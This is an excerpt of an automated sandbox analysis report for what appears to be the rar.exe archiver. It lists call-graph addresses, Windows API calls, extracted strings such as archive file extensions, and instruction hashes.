7ff6bbcc11b0 39336->39345 39346 7ff6bbcc17c8 216 API calls 2 library calls 39337->39346 39339 7ff6bbcc166a 39339->39325 39340 7ff6bbce6fe8 216 API calls 39340->39345 39341 7ff6bbce6d38 216 API calls 39341->39345 39342 7ff6bbce6e90 216 API calls 39342->39345 39343 7ff6bbcc1080 48 API calls 39343->39345 39345->39339 39345->39340 39345->39341 39345->39342 39345->39343 39347 7ff6bbcc17c8 216 API calls 2 library calls 39345->39347 39346->39345 39347->39345 39348 7ff6bbd1231c 39349 7ff6bbd1238c 39348->39349 39350 7ff6bbd12342 GetModuleHandleW 39348->39350 39361 7ff6bbd16938 EnterCriticalSection 39349->39361 39350->39349 39354 7ff6bbd1234f 39350->39354 39352 7ff6bbd16998 abort LeaveCriticalSection 39353 7ff6bbd12460 39352->39353 39356 7ff6bbd1246c 39353->39356 39360 7ff6bbd12488 11 API calls 39353->39360 39354->39349 39362 7ff6bbd124d4 GetModuleHandleExW 39354->39362 39355 7ff6bbd12410 39355->39352 39357 7ff6bbd12396 39357->39355 39358 7ff6bbd143b8 16 API calls 39357->39358 39358->39355 39360->39356 39363 7ff6bbd124fe GetProcAddress 39362->39363 39364 7ff6bbd12525 39362->39364 39363->39364 39365 7ff6bbd12518 39363->39365 39366 7ff6bbd1252f FreeLibrary 39364->39366 39367 7ff6bbd12535 39364->39367 39365->39364 39366->39367 39367->39349 39368 7ff6bbd0b0fc 39387 7ff6bbd0aa8c 39368->39387 39372 7ff6bbd0b148 39377 7ff6bbd0b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 39372->39377 39395 7ff6bbd1472c 39372->39395 39373 7ff6bbd0b123 __scrt_acquire_startup_lock 39373->39372 39443 7ff6bbd0b52c 7 API calls memcpy_s 39373->39443 39376 7ff6bbd0b16d 39377->39376 39378 7ff6bbd0b1f7 39377->39378 39444 7ff6bbd12574 35 API calls __FrameUnwindToState 39377->39444 39399 7ff6bbd13fc4 39378->39399 39386 7ff6bbd0b220 39445 7ff6bbd0ac64 8 API calls 2 library calls 39386->39445 39388 7ff6bbd0aaae __isa_available_init 39387->39388 39446 7ff6bbd0e2f8 39388->39446 39391 7ff6bbd0aab7 39391->39373 39442 7ff6bbd0b52c 7 API calls memcpy_s 39391->39442 39397 7ff6bbd14744 
39395->39397 39396 7ff6bbd14766 39396->39377 39397->39396 39495 7ff6bbd0b010 39397->39495 39400 7ff6bbd0b20c 39399->39400 39401 7ff6bbd13fd4 39399->39401 39403 7ff6bbce7e20 39400->39403 39587 7ff6bbd13c84 39401->39587 39627 7ff6bbcfb470 GetModuleHandleW 39403->39627 39409 7ff6bbce7e58 SetErrorMode GetModuleHandleW 39410 7ff6bbcf48cc 21 API calls 39409->39410 39411 7ff6bbce7e7d 39410->39411 39412 7ff6bbcf3e48 137 API calls 39411->39412 39413 7ff6bbce7e90 39412->39413 39414 7ff6bbcc3d3c 126 API calls 39413->39414 39415 7ff6bbce7e9c 39414->39415 39416 7ff6bbd0a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39415->39416 39417 7ff6bbce7ead 39416->39417 39418 7ff6bbce7ebf 39417->39418 39419 7ff6bbcc3f18 70 API calls 39417->39419 39420 7ff6bbcc4d1c 157 API calls 39418->39420 39419->39418 39421 7ff6bbce7ed6 39420->39421 39422 7ff6bbce7eef 39421->39422 39423 7ff6bbcc6ad0 154 API calls 39421->39423 39424 7ff6bbcc4d1c 157 API calls 39422->39424 39425 7ff6bbce7ee7 39423->39425 39426 7ff6bbce7eff 39424->39426 39427 7ff6bbcc4e48 160 API calls 39425->39427 39428 7ff6bbce7f0d 39426->39428 39430 7ff6bbce7f14 39426->39430 39427->39422 39429 7ff6bbcfb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39428->39429 39429->39430 39431 7ff6bbcc4888 58 API calls 39430->39431 39432 7ff6bbce7f57 39431->39432 39433 7ff6bbcc4fd0 268 API calls 39432->39433 39434 7ff6bbce7f5f 39433->39434 39435 7ff6bbce7f9e 39434->39435 39436 7ff6bbce7f8c 39434->39436 39440 7ff6bbd0b684 GetModuleHandleW 39435->39440 39437 7ff6bbcfb650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 39436->39437 39438 7ff6bbce7f93 39437->39438 39438->39435 39439 7ff6bbcfb57c 14 API calls 39438->39439 39439->39435 39441 7ff6bbd0b698 39440->39441 39441->39386 39442->39373 39443->39372 39444->39378 39445->39376 39447 7ff6bbd0e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 39446->39447 39459 7ff6bbd0eb08 39447->39459 39450 
7ff6bbd0aab3 39450->39391 39454 7ff6bbd145e4 39450->39454 39452 7ff6bbd0e318 39452->39450 39466 7ff6bbd0eb50 DeleteCriticalSection 39452->39466 39456 7ff6bbd19d4c 39454->39456 39455 7ff6bbd0aac0 39455->39391 39458 7ff6bbd0e32c 8 API calls 3 library calls 39455->39458 39456->39455 39483 7ff6bbd166c0 39456->39483 39458->39391 39460 7ff6bbd0eb10 39459->39460 39462 7ff6bbd0eb41 39460->39462 39464 7ff6bbd0e30b 39460->39464 39467 7ff6bbd0e678 39460->39467 39472 7ff6bbd0eb50 DeleteCriticalSection 39462->39472 39464->39450 39465 7ff6bbd0e8a4 8 API calls 3 library calls 39464->39465 39465->39452 39466->39450 39473 7ff6bbd0e34c 39467->39473 39470 7ff6bbd0e6cf InitializeCriticalSectionAndSpinCount 39471 7ff6bbd0e6bb 39470->39471 39471->39460 39472->39464 39474 7ff6bbd0e3b2 39473->39474 39478 7ff6bbd0e3ad 39473->39478 39474->39470 39474->39471 39475 7ff6bbd0e47a 39475->39474 39477 7ff6bbd0e489 GetProcAddress 39475->39477 39476 7ff6bbd0e3e5 LoadLibraryExW 39476->39478 39479 7ff6bbd0e40b GetLastError 39476->39479 39477->39474 39480 7ff6bbd0e4a1 39477->39480 39478->39474 39478->39475 39478->39476 39482 7ff6bbd0e458 FreeLibrary 39478->39482 39479->39478 39481 7ff6bbd0e416 LoadLibraryExW 39479->39481 39480->39474 39481->39478 39482->39478 39494 7ff6bbd16938 EnterCriticalSection 39483->39494 39485 7ff6bbd166d0 39486 7ff6bbd18050 32 API calls 39485->39486 39487 7ff6bbd166d9 39486->39487 39488 7ff6bbd164d0 34 API calls 39487->39488 39493 7ff6bbd166e7 39487->39493 39490 7ff6bbd166e2 39488->39490 39489 7ff6bbd16998 abort LeaveCriticalSection 39491 7ff6bbd166f3 39489->39491 39492 7ff6bbd165bc GetStdHandle GetFileType 39490->39492 39491->39456 39492->39493 39493->39489 39496 7ff6bbd0b020 pre_c_initialization 39495->39496 39516 7ff6bbd12b00 39496->39516 39498 7ff6bbd0b02c pre_c_initialization 39522 7ff6bbd0aad8 39498->39522 39500 7ff6bbd0b045 39501 7ff6bbd0b049 _RTC_Initialize 39500->39501 39502 7ff6bbd0b0b5 39500->39502 39527 7ff6bbd0ace0 39501->39527 39559 7ff6bbd0b52c 7 API calls 
memcpy_s 39502->39559 39504 7ff6bbd0b0bf 39560 7ff6bbd0b52c 7 API calls memcpy_s 39504->39560 39506 7ff6bbd0b05a pre_c_initialization 39530 7ff6bbd13b0c 39506->39530 39508 7ff6bbd0b0ca __scrt_initialize_default_local_stdio_options 39508->39397 39511 7ff6bbd0b06a 39558 7ff6bbd0b7dc RtlInitializeSListHead 39511->39558 39513 7ff6bbd0b06f __CxxCallCatchBlock pre_c_initialization 39514 7ff6bbd14818 pre_c_initialization 35 API calls 39513->39514 39515 7ff6bbd0b09a pre_c_initialization 39514->39515 39515->39397 39517 7ff6bbd12b11 39516->39517 39521 7ff6bbd12b19 39517->39521 39561 7ff6bbd14f3c 15 API calls abort 39517->39561 39519 7ff6bbd12b28 39562 7ff6bbd14e1c 31 API calls _invalid_parameter_noinfo 39519->39562 39521->39498 39523 7ff6bbd0ab96 39522->39523 39526 7ff6bbd0aaf0 __scrt_initialize_onexit_tables __scrt_release_startup_lock 39522->39526 39563 7ff6bbd0b52c 7 API calls memcpy_s 39523->39563 39525 7ff6bbd0aba0 39526->39500 39564 7ff6bbd0ac90 39527->39564 39529 7ff6bbd0ace9 39529->39506 39531 7ff6bbd13b2a 39530->39531 39532 7ff6bbd13b40 39530->39532 39569 7ff6bbd14f3c 15 API calls abort 39531->39569 39571 7ff6bbd19370 39532->39571 39536 7ff6bbd13b2f 39570 7ff6bbd14e1c 31 API calls _invalid_parameter_noinfo 39536->39570 39537 7ff6bbd13b72 39575 7ff6bbd138ec 35 API calls pre_c_initialization 39537->39575 39539 7ff6bbd0b066 39539->39504 39539->39511 39541 7ff6bbd13b9c 39576 7ff6bbd13aa8 15 API calls 2 library calls 39541->39576 39543 7ff6bbd13bb2 39544 7ff6bbd13bba 39543->39544 39545 7ff6bbd13bcb 39543->39545 39577 7ff6bbd14f3c 15 API calls abort 39544->39577 39578 7ff6bbd138ec 35 API calls pre_c_initialization 39545->39578 39548 7ff6bbd13be7 39550 7ff6bbd13c17 39548->39550 39551 7ff6bbd13c30 39548->39551 39556 7ff6bbd13bbf 39548->39556 39549 7ff6bbd14a74 __free_lconv_num 15 API calls 39549->39539 39579 7ff6bbd14a74 39550->39579 39554 7ff6bbd14a74 __free_lconv_num 15 API calls 39551->39554 39553 7ff6bbd13c20 39555 7ff6bbd14a74 __free_lconv_num 15 API calls 39553->39555 
39554->39556 39557 7ff6bbd13c2c 39555->39557 39556->39549 39557->39539 39559->39504 39560->39508 39561->39519 39562->39521 39563->39525 39565 7ff6bbd0acbf 39564->39565 39566 7ff6bbd0acb5 _onexit 39564->39566 39568 7ff6bbd14434 34 API calls _onexit 39565->39568 39566->39529 39568->39566 39569->39536 39570->39539 39572 7ff6bbd1937d 39571->39572 39573 7ff6bbd13b45 GetModuleFileNameA 39571->39573 39585 7ff6bbd191b0 48 API calls 4 library calls 39572->39585 39573->39537 39575->39541 39576->39543 39577->39556 39578->39548 39580 7ff6bbd14a79 RtlFreeHeap 39579->39580 39581 7ff6bbd14aa9 __free_lconv_num 39579->39581 39580->39581 39582 7ff6bbd14a94 39580->39582 39581->39553 39586 7ff6bbd14f3c 15 API calls abort 39582->39586 39584 7ff6bbd14a99 GetLastError 39584->39581 39585->39573 39586->39584 39588 7ff6bbd13c98 39587->39588 39589 7ff6bbd13ca1 39587->39589 39588->39589 39593 7ff6bbd13ccc 39588->39593 39589->39400 39594 7ff6bbd13caa 39593->39594 39595 7ff6bbd13ce5 39593->39595 39594->39589 39605 7ff6bbd13e78 17 API calls 2 library calls 39594->39605 39596 7ff6bbd19370 pre_c_initialization 48 API calls 39595->39596 39597 7ff6bbd13cea 39596->39597 39606 7ff6bbd1978c GetEnvironmentStringsW 39597->39606 39600 7ff6bbd13cf7 39603 7ff6bbd14a74 __free_lconv_num 15 API calls 39600->39603 39602 7ff6bbd13d04 39604 7ff6bbd14a74 __free_lconv_num 15 API calls 39602->39604 39603->39594 39604->39600 39605->39589 39607 7ff6bbd197ba WideCharToMultiByte 39606->39607 39608 7ff6bbd1985e 39606->39608 39607->39608 39610 7ff6bbd19814 39607->39610 39611 7ff6bbd19868 FreeEnvironmentStringsW 39608->39611 39612 7ff6bbd13cef 39608->39612 39619 7ff6bbd14ab4 39610->39619 39611->39612 39612->39600 39618 7ff6bbd13d38 31 API calls 4 library calls 39612->39618 39615 7ff6bbd1984b 39617 7ff6bbd14a74 __free_lconv_num 15 API calls 39615->39617 39616 7ff6bbd19824 WideCharToMultiByte 39616->39615 39617->39608 39618->39602 39620 7ff6bbd14aff 39619->39620 39624 7ff6bbd14ac3 __vcrt_getptd_noexit 39619->39624 39626 
7ff6bbd14f3c 15 API calls abort 39620->39626 39622 7ff6bbd14ae6 RtlAllocateHeap 39623 7ff6bbd14afd 39622->39623 39622->39624 39623->39615 39623->39616 39624->39620 39624->39622 39625 7ff6bbd136c0 new 2 API calls 39624->39625 39625->39624 39626->39623 39628 7ff6bbce7e45 39627->39628 39629 7ff6bbcfb496 GetProcAddress 39627->39629 39632 7ff6bbcc7a68 39628->39632 39630 7ff6bbcfb4ae 39629->39630 39631 7ff6bbcfb4cb GetProcAddress 39629->39631 39630->39631 39631->39628 39633 7ff6bbcc7a76 39632->39633 39653 7ff6bbd12ae4 39633->39653 39635 7ff6bbcc7a80 39636 7ff6bbd12ae4 setbuf 60 API calls 39635->39636 39637 7ff6bbcc7a94 39636->39637 39662 7ff6bbcc7b44 GetStdHandle GetFileType 39637->39662 39640 7ff6bbcc7b44 3 API calls 39641 7ff6bbcc7aae 39640->39641 39642 7ff6bbcc7b44 3 API calls 39641->39642 39644 7ff6bbcc7abe 39642->39644 39643 7ff6bbcc7b12 39652 7ff6bbcccd78 SetConsoleCtrlHandler 39643->39652 39646 7ff6bbcc7aeb 39644->39646 39665 7ff6bbd12abc 31 API calls 2 library calls 39644->39665 39646->39643 39667 7ff6bbd12abc 31 API calls 2 library calls 39646->39667 39647 7ff6bbcc7adf 39666 7ff6bbd12b40 33 API calls 2 library calls 39647->39666 39650 7ff6bbcc7b06 39668 7ff6bbd12b40 33 API calls 2 library calls 39650->39668 39654 7ff6bbd12ae9 39653->39654 39655 7ff6bbd17ee8 39654->39655 39658 7ff6bbd17f23 39654->39658 39669 7ff6bbd14f3c 15 API calls abort 39655->39669 39657 7ff6bbd17eed 39670 7ff6bbd14e1c 31 API calls _invalid_parameter_noinfo 39657->39670 39671 7ff6bbd17d98 60 API calls 2 library calls 39658->39671 39661 7ff6bbd17ef8 39661->39635 39663 7ff6bbcc7b61 GetConsoleMode 39662->39663 39664 7ff6bbcc7a9e 39662->39664 39663->39664 39664->39640 39665->39647 39666->39646 39667->39650 39668->39643 39669->39657 39670->39661 39671->39661 39672 7ff6bbcb3b53 39673 7ff6bbcb3b64 39672->39673 39723 7ff6bbcd1e80 39673->39723 39674 7ff6bbcb3c09 39735 7ff6bbcd23f0 39674->39735 39676 7ff6bbcb3c18 39740 7ff6bbcb8050 157 API calls 39676->39740 39677 7ff6bbcb3bb6 39677->39674 39677->39676 
39678 7ff6bbcb3c01 39677->39678 39681 7ff6bbcd1c24 12 API calls 39678->39681 39680 7ff6bbcb3c3d 39741 7ff6bbcb8010 13 API calls 39680->39741 39681->39674 39683 7ff6bbcb3ccc 39704 7ff6bbcb3c90 39683->39704 39748 7ff6bbcd2414 61 API calls 39683->39748 39684 7ff6bbcb3c45 39687 7ff6bbcb3c54 39684->39687 39742 7ff6bbcccba8 75 API calls 39684->39742 39743 7ff6bbcba9d4 186 API calls wcschr 39687->39743 39688 7ff6bbcb3cf9 39749 7ff6bbcd1998 138 API calls 39688->39749 39692 7ff6bbcb3c5c 39744 7ff6bbcb93ac 8 API calls 39692->39744 39693 7ff6bbcb3d10 39695 7ff6bbcd18ac 15 API calls 39693->39695 39695->39704 39696 7ff6bbcb3c66 39698 7ff6bbcb3c77 39696->39698 39745 7ff6bbccca40 61 API calls _CxxThrowException 39696->39745 39746 7ff6bbcb8090 8 API calls 39698->39746 39701 7ff6bbcb3c7f 39701->39704 39747 7ff6bbccca40 61 API calls _CxxThrowException 39701->39747 39750 7ff6bbcfd400 48 API calls 39704->39750 39724 7ff6bbcd1e95 setbuf 39723->39724 39725 7ff6bbcd1ecb CreateFileW 39724->39725 39726 7ff6bbcd1fb8 39725->39726 39727 7ff6bbcd1f59 GetLastError 39725->39727 39728 7ff6bbcd1ff7 39726->39728 39730 7ff6bbcd1fd9 SetFileTime 39726->39730 39729 7ff6bbce4534 10 API calls 39727->39729 39732 7ff6bbd0a610 _handle_error 8 API calls 39728->39732 39731 7ff6bbcd1f74 39729->39731 39730->39728 39731->39726 39733 7ff6bbcd1f78 CreateFileW GetLastError 39731->39733 39734 7ff6bbcd203a 39732->39734 39733->39726 39734->39677 39751 7ff6bbcd24e8 39735->39751 39738 7ff6bbcd240e 39738->39683 39740->39680 39741->39684 39743->39692 39744->39696 39745->39698 39746->39701 39747->39704 39748->39688 39749->39693 39757 7ff6bbcd1af0 39751->39757 39754 7ff6bbcd23f9 39754->39738 39756 7ff6bbccca40 61 API calls _CxxThrowException 39754->39756 39756->39738 39758 7ff6bbcd1b01 setbuf 39757->39758 39759 7ff6bbcd1b6f CreateFileW 39758->39759 39760 7ff6bbcd1b68 39758->39760 39759->39760 39761 7ff6bbcd1be1 39760->39761 39762 7ff6bbce4534 10 API calls 39760->39762 39764 7ff6bbd0a610 _handle_error 8 API calls 
39761->39764 39763 7ff6bbcd1bb3 39762->39763 39763->39761 39765 7ff6bbcd1bb7 CreateFileW 39763->39765 39766 7ff6bbcd1c14 39764->39766 39765->39761 39766->39754 39767 7ff6bbccca08 10 API calls 39766->39767 39767->39754 39768 7ff6bbd12450 39775 7ff6bbd13734 39768->39775 39770 7ff6bbd12455 39771 7ff6bbd16998 abort LeaveCriticalSection 39770->39771 39772 7ff6bbd12460 39771->39772 39773 7ff6bbd1246c 39772->39773 39774 7ff6bbd12488 11 API calls 39772->39774 39774->39773 39780 7ff6bbd15630 GetLastError 39775->39780 39779 7ff6bbd1373f 39800 7ff6bbd14a1c 35 API calls abort 39779->39800 39781 7ff6bbd15652 39780->39781 39782 7ff6bbd1564d 39780->39782 39786 7ff6bbd1569b 39781->39786 39802 7ff6bbd14b14 15 API calls 3 library calls 39781->39802 39801 7ff6bbd16cf4 6 API calls __vcrt_uninitialize_ptd 39782->39801 39785 7ff6bbd15669 39787 7ff6bbd15671 39785->39787 39803 7ff6bbd16d4c 6 API calls __vcrt_uninitialize_ptd 39785->39803 39789 7ff6bbd156b6 SetLastError 39786->39789 39790 7ff6bbd156a0 SetLastError 39786->39790 39793 7ff6bbd14a74 __free_lconv_num 15 API calls 39787->39793 39805 7ff6bbd14a1c 35 API calls abort 39789->39805 39790->39779 39791 7ff6bbd15688 39791->39787 39794 7ff6bbd1568f 39791->39794 39796 7ff6bbd15678 39793->39796 39804 7ff6bbd153e0 15 API calls abort 39794->39804 39796->39789 39798 7ff6bbd15694 39799 7ff6bbd14a74 __free_lconv_num 15 API calls 39798->39799 39799->39786 39801->39781 39802->39785 39803->39791 39804->39798 39806 7ff6bbd19c74 39807 7ff6bbd19c7c 39806->39807 39808 7ff6bbd19cbb 39807->39808 39810 7ff6bbd19cac 39807->39810 39809 7ff6bbd19cc5 39808->39809 39828 7ff6bbd1ce08 32 API calls 2 library calls 39808->39828 39815 7ff6bbd14b8c 39809->39815 39827 7ff6bbd14f3c 15 API calls abort 39810->39827 39814 7ff6bbd19cb1 memcpy_s 39816 7ff6bbd14bab 39815->39816 39817 7ff6bbd14ba1 39815->39817 39819 7ff6bbd14bb0 39816->39819 39825 7ff6bbd14bb7 __vcrt_getptd_noexit 39816->39825 39818 7ff6bbd14ab4 setbuf 16 API calls 39817->39818 39824 7ff6bbd14ba9 
39818->39824 39820 7ff6bbd14a74 __free_lconv_num 15 API calls 39819->39820 39820->39824 39821 7ff6bbd14bf6 39829 7ff6bbd14f3c 15 API calls abort 39821->39829 39822 7ff6bbd14be0 RtlReAllocateHeap 39822->39824 39822->39825 39824->39814 39825->39821 39825->39822 39826 7ff6bbd136c0 new 2 API calls 39825->39826 39826->39825 39827->39814 39828->39809 39829->39824 39830 7ff6bbcb7a5b 39831 7ff6bbcb7a60 39830->39831 39832 7ff6bbcc9be0 14 API calls 39831->39832 39834 7ff6bbcb7af7 39831->39834 39832->39834 39833 7ff6bbcb7bda 39836 7ff6bbcbb540 147 API calls 39833->39836 39834->39833 39863 7ff6bbcd1e1c GetFileTime 39834->39863 39837 7ff6bbcb7bf8 39836->39837 39840 7ff6bbcb7c3e 39837->39840 39864 7ff6bbd09b98 216 API calls 3 library calls 39837->39864 39839 7ff6bbcbb540 147 API calls 39842 7ff6bbcb7c9c 39839->39842 39840->39839 39841 7ff6bbcb7f89 39842->39841 39865 7ff6bbcd6378 39842->39865 39844 7ff6bbcb7cd7 39845 7ff6bbcd6378 4 API calls 39844->39845 39847 7ff6bbcb7cf3 39845->39847 39846 7ff6bbcb7de1 39853 7ff6bbcb7e4e 39846->39853 39870 7ff6bbce98dc 39846->39870 39847->39846 39849 7ff6bbcb7d38 39847->39849 39850 7ff6bbcb7d59 39847->39850 39852 7ff6bbd0a444 new 4 API calls 39849->39852 39851 7ff6bbd0a444 new 4 API calls 39850->39851 39857 7ff6bbcb7d42 std::bad_alloc::bad_alloc 39851->39857 39852->39857 39876 7ff6bbcb1204 48 API calls 39853->39876 39855 7ff6bbcb7eb3 39858 7ff6bbcb7edb 39855->39858 39877 7ff6bbce9680 39855->39877 39857->39846 39869 7ff6bbd0ba34 RtlPcToFileHeader RaiseException 39857->39869 39883 7ff6bbcd6424 8 API calls _handle_error 39858->39883 39861 7ff6bbcb7f56 39862 7ff6bbcbb540 147 API calls 39861->39862 39862->39841 39863->39833 39864->39840 39866 7ff6bbcd6396 39865->39866 39868 7ff6bbcd63a0 39865->39868 39867 7ff6bbd0a444 new 4 API calls 39866->39867 39867->39868 39868->39844 39869->39846 39871 7ff6bbce993c 39870->39871 39872 7ff6bbce9926 39870->39872 39874 7ff6bbcc90b8 75 API calls 39871->39874 39873 7ff6bbcc90b8 75 API calls 39872->39873 39875 
7ff6bbce9934 39873->39875 39874->39875 39875->39853 39876->39855 39878 7ff6bbce96a4 39877->39878 39879 7ff6bbce97d7 39878->39879 39880 7ff6bbcd2574 126 API calls 39878->39880 39882 7ff6bbd09b98 216 API calls 39878->39882 39884 7ff6bbcd6498 72 API calls new 39878->39884 39880->39878 39882->39878 39883->39861 39884->39878
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID:
• String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
• API String ID: 0-1628410872
• Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction ID: 06c2e6b802bfc482f84bc09b4a0c66c8a8b6f31a4673935ebaaf1c56d7b07e73
• Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction Fuzzy Hash: 9DC2B472A0C18281EA64DF2C824D1BD2AB1BF29784F998135CB4EC72F5DF6DE945C394
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID:
• String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
• API String ID: 0-1660254149

Control-flow Graph

APIs
• Part of subcall function 00007FF6BBCF4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF6BBCCCC90), ref: 00007FF6BBCF4AF5
• GetModuleFileNameW.KERNEL32(?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF492E
• GetVersionExW.KERNEL32(?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF496A
• LoadLibraryExW.KERNELBASE(?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF4993
• LoadLibraryW.KERNEL32(?,?,?,00007FF6BBCE7E7D), ref: 00007FF6BBCF499F
Strings
Similarity
• API ID: Library$Load$FileFreeModuleNameVersion
• String ID: rarlng.dll
• API String ID: 2520153904-1675521814

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD4736
• FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD476B
• GetLastError.KERNEL32(?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD477A
• FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD47A4
• GetLastError.KERNEL32(?,00000000,?,?,00007FF6BBCD4620,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD47B2
Similarity
• API ID: FileFind$ErrorFirstLast$Next
• String ID:
• API String ID: 869497890-0
APIs
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
APIs
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Char
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 751630497-0
                                                                                                                                                                                                                              • Opcode ID: 544a3eeab9b7365b5894b0fe2e19e3e09eeebdeb3bd711af898eb3b5dda5a90f
                                                                                                                                                                                                                              • Instruction ID: e438bf8a6299c7ab51eecd28e0f4b122e952251489ffa04f8dc04bc7d265d81d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 544a3eeab9b7365b5894b0fe2e19e3e09eeebdeb3bd711af898eb3b5dda5a90f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F22AF22A0868696EB24DF34D5452FEBBB0FB58748F484035DB8D972A9CF7CE942C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
